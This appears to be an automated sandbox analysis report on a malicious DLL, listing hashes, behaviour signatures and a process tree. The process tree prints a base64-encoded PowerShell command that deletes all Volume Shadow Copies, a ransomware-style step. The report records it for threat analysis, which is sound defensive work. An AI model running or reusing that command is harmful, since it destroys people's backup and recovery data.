Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 12:55

General

  • Target

    42996516b6604ba136ff909d9b59d2a676a72eaafa30c729cdfaddd96b20fc83.dll

  • Size

    164KB

  • MD5

    4903f3effb98da65c49bb9591c16615d

  • SHA1

    d53e85991420c1475385babd72d31ee77faefc6d

  • SHA256

    42996516b6604ba136ff909d9b59d2a676a72eaafa30c729cdfaddd96b20fc83

  • SHA512

    454b8a5f3528ce77d993b84ccd0df7b8f0843a6a47516b1aa13fe6cbb79d1853646e03c7c9663266df154fd464f594d41be1e392d0c8c3dd676e4348e5149880

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\42996516b6604ba136ff909d9b59d2a676a72eaafa30c729cdfaddd96b20fc83.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\42996516b6604ba136ff909d9b59d2a676a72eaafa30c729cdfaddd96b20fc83.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:668
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:432

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/668-56-0x000007FEFB781000-0x000007FEFB783000-memory.dmp
    Filesize

    8KB

  • memory/668-58-0x00000000025E0000-0x00000000025E2000-memory.dmp
    Filesize

    8KB

  • memory/668-59-0x00000000025E2000-0x00000000025E4000-memory.dmp
    Filesize

    8KB

  • memory/668-60-0x00000000025E4000-0x00000000025E7000-memory.dmp
    Filesize

    12KB

  • memory/668-57-0x000007FEF2A20000-0x000007FEF357D000-memory.dmp
    Filesize

    11.4MB

  • memory/668-61-0x00000000025EB000-0x000000000260A000-memory.dmp
    Filesize

    124KB

  • memory/1648-55-0x0000000075421000-0x0000000075423000-memory.dmp
    Filesize

    8KB